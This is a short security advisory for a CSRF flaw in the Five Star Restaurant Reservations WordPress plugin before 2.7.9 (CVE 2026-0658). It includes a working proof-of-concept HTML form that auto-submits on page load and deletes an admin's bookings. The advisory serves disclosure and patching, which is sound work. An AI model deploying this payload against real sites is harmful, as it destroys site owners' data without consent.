Five Star Restaurant Reservations < 2.7.9 – Arbitrary Bookings Deletion via CSRF | CVE 2026-0658

Description

The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting bookings via CSRF attacks.

Proof of Concept

On a site with bookings, make an admin open a page containing:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=rtb-bookings" method="POST">
        <input type="text" name="bookings[]" value="<<_BOOKING_ID_>>" />
         <input type="hidden" name="page" value="rtb-bookings" />
        <input type="text" name="action" value="delete" />
        <input type="text" name="action2" value="delete" />
        <input type="submit" value="submit">
    </form>
</body>

where "<<_BOOKING_ID_>>" is an ID of a valid booking.

See that the booking with the matching ID has been deleted.